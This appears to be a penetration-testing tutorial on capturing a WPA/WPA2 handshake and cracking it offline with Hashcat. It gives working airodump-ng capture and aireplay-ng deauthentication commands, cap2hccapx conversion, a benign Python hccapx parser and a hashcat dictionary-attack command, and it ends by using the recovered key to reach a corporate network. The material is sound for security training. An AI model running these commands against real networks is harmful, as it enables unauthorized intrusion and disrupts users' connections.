63 WiFi Hijacking hccapx Part 8
Description
Wireless handshakes

Crack wireless handshakes (WPA/WPA2) with Hashcat

Although wireless isn't always the most exciting, it can be interesting if you can capture a WPA/WPA2 handshake. Wireless networks are often not properly segmented from a company's corporate network, and successful authentication to the wireless network may grant full access to the internal corporate network. Hashcat can crack both the MIC (from the 4-way handshake) and the PMKID (from the first EAPOL frame of the handshake).

MIC cracking

When a client connects to a wireless network, the client and the wireless access point (AP) must each prove that they know the wireless network key without ever transmitting the key itself over the air. The key material is encrypted and verified by the AP. To perform this type of offline cracking attack, we need to capture a valid four-way handshake. This is done by sending deauthentication frames to force a client (user) to disconnect from the AP; when the client reauthenticates (usually automatically), the attacker can sniff the 4-way WPA handshake without the user's knowledge. The handshake is a collection of keys exchanged during the authentication process between the client and the associated AP. From these keys the Message Integrity Check (MIC) is derived, which the AP uses to verify that each packet is undamaged and was received in its original state.
4-way handshake capture

We run airodump-ng to monitor a specific network and either wait until a new client connects or disconnect an existing client from the network. Run this command in the background; it will indicate when the 4-way handshake has been captured:

airodump-ng --bssid d4:35:1d:50:1e:fc --channel 1 --write wpa_handshake wlan0

A client can be disconnected for a short time, just long enough to capture the 4-way handshake when it reconnects:

aireplay-ng --deauth 4 -a d4:35:1d:50:1e:fc -c 34:2f:bd:27:63:ea wlan0

airodump-ng shows the handshake indicator in the upper right corner of its output.

Convert to hccapx format

After we have successfully captured a 4-way handshake with a tool such as airodump-ng, we need to convert it to the hccapx format that Hashcat accepts for cracking. Hashcat hosts an online service that performs this conversion: https://hashcat.net/cap2hccapx

To do the conversion offline, we need the hashcat-utils repository from GitHub. We can clone the repo and build the tool as follows:

$ git clone https://github.com/hashcat/hashcat-utils.git
$ cd hashcat-utils/src
$ make

cap2hccapx - Syntax

$ ./cap2hccapx.bin
usage: ./cap2hccapx.bin input.cap output.hccapx [filter by essid] [additional network essid:bssid]

Next, we provide the tool with the packet capture (.cap) file to convert to hccapx format for Hashcat:

$ ./cap2hccapx.bin corp_capture1-01.cap mic_to_crack.hccapx
Networks detected: 1
[*] BSSID=cc:40:d0:a4:d0:96 ESSID=CORP-WIFI (Length: 9)
 -- STA=48:e2:44:a7:c4:fb, Message Pair=0, Replay Counter=1
 -- STA=48:e2:44:a7:c4:fb, Message Pair=2, Replay Counter=1
 -- STA=48:e2:44:a7:c4:fb, Message Pair=0, Replay Counter=1
 ...
Written 8 WPA Handshakes to: /home/mrb3n/Desktop/mic_to_crack.hccapx

With this file (mic_to_crack.hccapx), we can proceed to cracking. For this example, we will perform a straight dictionary attack against the WPA handshake.
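Before spending GPU time on a converted file, it is worth checking what the converter actually wrote: how many handshakes, for which ESSID/BSSID, from which stations, and which EAPOL message pairs. This added example (not from the video or from hashcat-utils) parses the hccapx container according to the hashcat hccapx record layout (393 bytes per handshake, little-endian); the sample file is constructed in the code from the page's ESSID, BSSID and station values with zeroed nonces, MIC and EAPOL data, so it is not a real capture.

```python
import struct

# One hccapx record is 393 bytes, little-endian (layout from the hashcat hccapx spec).
HCCAPX = struct.Struct("<4sIBB32sB16s6s32s6s32sH256s")
SIGNATURE, VERSION = b"HCPX", 4
KEYVER = {1: "WPA (TKIP)", 2: "WPA2 (CCMP)", 3: "WPA2 (AES-128-CMAC)"}
PAIRS = {0: "M1+M2", 1: "M1+M4", 2: "M2+M3", 3: "M2+M3 (EAPOL from M3)",
         4: "M3+M4", 5: "M3+M4 (EAPOL from M4)"}

def parse_hccapx(data: bytes) -> list:
    """Validate every record and return one summary dict per handshake."""
    if len(data) == 0 or len(data) % HCCAPX.size:
        raise ValueError(f"size {len(data)} is not a multiple of {HCCAPX.size} bytes")
    records = []
    for off in range(0, len(data), HCCAPX.size):
        (sig, ver, mp, essid_len, essid, keyver, mic, mac_ap, _nonce_ap,
         mac_sta, _nonce_sta, eapol_len, _eapol) = HCCAPX.unpack_from(data, off)
        if sig != SIGNATURE or ver != VERSION:
            raise ValueError(f"bad signature/version at offset {off}")
        if essid_len > 32 or eapol_len > 256:
            raise ValueError(f"length field out of range at offset {off}")
        records.append({
            "essid": essid[:essid_len].decode("utf-8", "replace"),
            "bssid": mac_ap.hex(":"),
            "station": mac_sta.hex(":"),
            "keyver": KEYVER.get(keyver, f"unknown({keyver})"),
            # low bits select which two EAPOL messages the converter paired;
            # bit 7 is a converter flag, not a pair index, so it is masked off here
            "message_pair": PAIRS.get(mp & 0x07, f"unknown({mp & 0x07})"),
            "mic": mic.hex(),
            "eapol_len": eapol_len,
        })
    return records

def mac_bytes(s: str) -> bytes: return bytes.fromhex(s.replace(":", ""))

def build_record(essid: str, bssid: str, station: str, message_pair: int) -> bytes:
    """Constructed sample record (keyver 2, zeroed nonces/MIC/EAPOL); not a real capture."""
    e = essid.encode()
    return HCCAPX.pack(SIGNATURE, VERSION, message_pair, len(e), e.ljust(32, b"\0"),
                       2, b"\0" * 16, mac_bytes(bssid), b"\0" * 32, mac_bytes(station),
                       b"\0" * 32, 121, b"\0" * 256)

# Constructed two-handshake file using the network and station shown in the cap2hccapx output.
SAMPLE = build_record("CORP-WIFI", "cc:40:d0:a4:d0:96", "48:e2:44:a7:c4:fb", 0) \
       + build_record("CORP-WIFI", "cc:40:d0:a4:d0:96", "48:e2:44:a7:c4:fb", 2)

if __name__ == "__main__":
    for i, r in enumerate(parse_hccapx(SAMPLE)):
        print(f"[{i}] {r['essid']} BSSID={r['bssid']} STA={r['station']} "
              f"{r['keyver']} pair={r['message_pair']} eapol_len={r['eapol_len']}")
```

To inspect a real converter output, replace SAMPLE with `open("mic_to_crack.hccapx", "rb").read()`; a size that is not a multiple of 393 or a record without the HCPX signature means the file was truncated or is not hccapx.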
For the wordlist we will use rockyou.txt; Crunch is another Linux tool you can use to generate one. To crack this hash we use hash mode 2500 (WPA/WPA2 EAPOL, hccapx input), so the command is:

hashcat -a 0 -m 2500 mic_to_crack.hccapx --deprecated-check-disable cell.txt

Armed with the recovered key, we can then attempt to authenticate to the wireless network and gain access to the company's internal network.